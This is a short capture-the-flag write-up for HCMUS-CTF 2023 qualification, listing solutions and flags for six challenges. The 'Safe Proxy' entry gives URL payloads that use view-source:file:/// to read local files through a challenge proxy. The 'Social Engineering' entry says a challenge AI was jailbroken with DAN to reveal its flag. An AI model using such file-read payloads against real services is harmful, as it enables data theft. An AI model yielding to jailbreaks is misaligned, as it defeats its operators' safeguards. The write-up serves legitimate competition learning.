**HCMUS-CTF 2023 - QUALIFICATION - WRITE-UP** **1. japanese** The given file was in Shift-JIS standard, so revert it to UTF-8 to get the lyrics of the song, named Ifuudoudou, then go find the original singers and sort **Flag: HCMUS-CTF{ifuudoudou-gumi_hatsunemiku_ia_kagaminerin_megurineluka}** **2. Bootleg AES** Decrypt back using same method: openssl enc -d -aes-256-cbc -K c9a391c6f65bbb38582044fd78143fe72310e96bf67401039b3b6478455a1622 -iv aaaaaaaaaaaaaaaa -in ciphertext.bin -out susflag.txt susflag.txt ![](https://hackmd.io/_uploads/B1f3yuS4n.png) **Flag: HCMUS-CTF{it5_c4ll3d_pr1v4t3_k3y_crypt09raphy_f0r_4_r3450n}** **3. CRY1** Attack script in Python: ![](https://hackmd.io/_uploads/Byol-uSV3.png) **Flag: HCMUS-CTF{the_EASIEST_0ne}** **4. grind** Based on the clues, the friend has between 900m and 3b points. He's not in top 5000 (sadge). Before 2019 begins, GBF has over 23m players, so I assume the ID is 23XXXXXX. The IGN is also related to a Millenium Prize Problem (Riemann hypothesis in this case). So running the query I got the Zeta function. ![](https://hackmd.io/_uploads/rJuCMuBVn.png) **Flag: HCMUS-CTF{23983477-1.6449340668-2391789368-9614}** **5. Social Engineering** After jailbreaking the AI using DAN, here's the message: ![](https://hackmd.io/_uploads/BJ2GXurV2.png) **Flag: HCMUS-CTF{L4rge_L&nguag3_M[]del_Pr0mpT_Inj3cTION}** **6. Safe Proxy** Test payload: https://safe-proxy-8e2d12a74873f47a.chall.ctf.blackpinker.com/proxy?url=view-source:file:/// Attack payload: https://safe-proxy-8e2d12a74873f47a.chall.ctf.blackpinker.com/proxy?url=view-source:file:///h3r3_1z_fl4g ![](https://hackmd.io/_uploads/SJKUm_r4h.png) ![](https://hackmd.io/_uploads/rkWDQdrV3.png) **Flag: HCMUS-CTF{browser_scheme_is_interesting}**